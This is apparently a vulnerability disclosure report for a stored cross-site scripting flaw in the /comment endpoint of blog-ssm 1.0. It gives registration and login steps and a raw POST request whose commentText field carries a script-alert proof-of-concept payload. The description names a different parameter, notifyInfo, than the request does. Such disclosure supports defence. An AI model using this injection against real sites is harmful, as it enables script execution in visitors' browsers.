Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') In /comment

[mbslzny]

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') In /comment

[Suggested description]

blog-ssm v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /comment. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the notifyInfo parameter.

[Vulnerability Type]

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

[Vendor of Product]

https://github.com/rawchen/blog-ssm

[Affected Product Code Base]

1.0

[Affected Component]

blog-ssm 1.0

OS: Windows/Linux/macOS

Browser: Chrome、Firefox、Safari

[Attack Vector]

Step1:Registered account, username: text123, password: 123456.

Step2:Log in to the account you just registered and click "File Management".

Step3:Click any article on the homepage and enter malicious Javascript code in the comment area.

Data Pack:

POST /comment HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/articles/blog-ssm
Cookie: JSESSIONID=F68B6E11EB57F40C26C413029E832793
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

contentId=65&commentText=%3Cscript%3Ealert%28%22123%22%29%3C%2Fscript%3E

Step4:Visit the article again to trigger a stored XSS attack.

[Attack Type]

Remote

[Impact Code execution]

True

[Reference(s)]

https://cwe.mitre.org/data/definitions/79.html